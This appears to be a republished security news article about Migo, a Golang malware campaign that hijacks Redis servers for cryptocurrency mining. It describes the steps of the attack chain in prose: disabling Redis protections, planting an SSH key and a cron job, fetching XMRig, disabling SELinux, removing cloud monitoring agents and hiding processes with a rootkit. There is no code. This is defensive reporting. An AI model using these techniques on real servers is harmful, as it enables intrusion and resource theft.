New Migo Malware Targeting Redis Servers for Cryptocurrency Mining

neub9
By neub9
4 Min Read



Feb 20, 2024

Newsroom

Server Security / Cryptojacking

A new malware campaign has been detected targeting Redis servers to gain initial access and eventually mine cryptocurrency on compromised Linux hosts.

“This particular campaign involves the use of a number of novel system weakening techniques against the data store itself,” said Cado security researcher Matt Muir in a technical report.

The cryptojacking attack is enabled by a malware called Migo, a Golang ELF binary that includes compile-time obfuscation and the capability to persist on Linux machines.

The campaign was detected after an “unusual series of commands” were identified by the cloud security company targeting its Redis honeypots, designed to weaken security defenses by disabling specific configuration options.

It’s believed that these options are turned off to allow the sending of additional commands to the Redis server from external networks and facilitate future exploitation without drawing much attention.

This initial step is followed by two Redis keys being set up, one pointing to an attacker-controlled SSH key and the other to a cron job that retrieves the primary payload from a file transfer service named Transfer.sh, a technique previously observed in early 2023.

The shell script to fetch Migo using Transfer.sh is embedded within a Pastebin file that’s obtained using a curl or wget command.


Redis Servers for Cryptocurrency Mining
Persistence

The Go-based ELF binary, in addition to incorporating mechanisms to resist reverse engineering, acts as a downloader for an XMRig installer hosted on GitHub. It’s also responsible for performing a series of steps to establish persistence, terminate competing miners, and launch the miner.

In addition, Migo disables Security-Enhanced Linux (SELinux) and searches for uninstallation scripts for monitoring agents bundled in compute instances from cloud providers such as Qcloud and Alibaba Cloud. It further deploys a modified version (“libsystemd.so”) of a popular user-mode rootkit named libprocesshider to hide processes and on-disk artifacts.

It’s worth noting that these actions overlap with tactics used by known cryptojacking groups like TeamTNT, WatchDog, Rocke, and threat actors associated with the SkidMap malware.

“Interestingly, Migo appears to recursively iterate through files and directories under /etc,” Muir noted. “The malware will simply read files in these locations and not do anything with the contents.”

“One theory is this could be a (weak) attempt to confuse sandbox and dynamic analysis solutions by performing a large number of benign actions, resulting in a non-malicious classification.”

Another hypothesis is that the malware is looking for an artifact that’s specific to a target environment, although Cado said it found no evidence to support this line of reasoning.

“Migo demonstrates that cloud-focused attackers are continuing to refine their techniques and improve their ability to exploit web-facing services,” Muir said.

“Although libprocesshider is frequently used by cryptojacking campaigns, this particular variant includes the ability to hide on-disk artifacts in addition to the malicious processes themselves.”

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.

Share This Article
Leave a comment

Leave a Reply

Your email address will not be published. Required fields are marked *